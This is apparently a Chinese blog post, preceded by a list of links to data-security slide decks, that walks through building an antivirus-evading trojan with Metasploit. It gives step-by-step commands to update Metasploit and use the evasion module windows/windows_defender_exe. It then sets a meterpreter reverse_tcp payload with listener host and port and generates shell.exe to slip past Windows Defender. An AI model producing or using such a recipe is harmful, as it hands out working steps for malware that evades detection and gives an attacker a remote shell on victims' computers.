利用Metasploit制作免杀木马

请大家认真选择投票项,后续更新以此作为依据。

今日更新PPT内容11个,内容:数据安全,

CASB保护零信任环境的数据安全实践:

https://www.secshi.com/39625.html

以数据为中心的人工智能时代数据安全和隐私保护战略动力-GDPR的影响和对策:https://www.secshi.com/39547.html

数据安全的冰与火之歌 从 GDPR 看企业数据安全合规建设:https://www.secshi.com/39457.html

业务流量数据安全应用实践:https://www.secshi.com/39409.html

企业数据安全合规之路:https://www.secshi.com/39203.html

业务数据安全实践:https://www.secshi.com/39189.html

攻防对抗中数据安全的持续优化:https://www.secshi.com/39175.html

加快工业互联网数据安全能力建设 切实护航我国制造业高质量发展:https://www.secshi.com/39153.html

AiLPHA大数据安全分析应用于医疗网络安全闭环的实践:https://www.secshi.com/39145.html

数据安全的若干误解:https://www.secshi.com/39115.html

数据安全保障工程:https://www.secshi.com/39113.html

前言

Metasploit 5.0的时候更新一个Evasion模块,这个模块能非常快捷的生成反杀毒软件的木马,注意!低于5.0以下的版本是没有Evasion模块的,所以需要手动更新Metasploit

Metasploit更新

如果是使用kail的同学就直接使用msfupdate就能进行更新,如果是使用别的系统的小伙伴就请进入到Metasploit目录下面的bin目录下面,运行msfupdate

利用

打开metasploit

查看evasion模块

这里我们选择第五个模块

use windows/windows_defender_exe

查看需要配置的参数

show options

可以看到只有一个文件名的参数可以配置,我们就修改为shell.exe吧

紧接着我们要配置回显payload

set payload windows/meterpreter/reverse_tcp
set lhost you-ip
set lport 4444

使用exploit或者run 执行

看到回显信息我们可以看到木马存放在/root/.msf4/local/下面
我们来检测一下免杀效果

来自安全师作者GEIT,博客地址:http://www.geit.work/

发布了27 篇原创文章 · 获赞 0 · 访问量 3213
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 游动-白 设计师: 上身试试

分享到微信朋友圈

×

扫一扫,手机浏览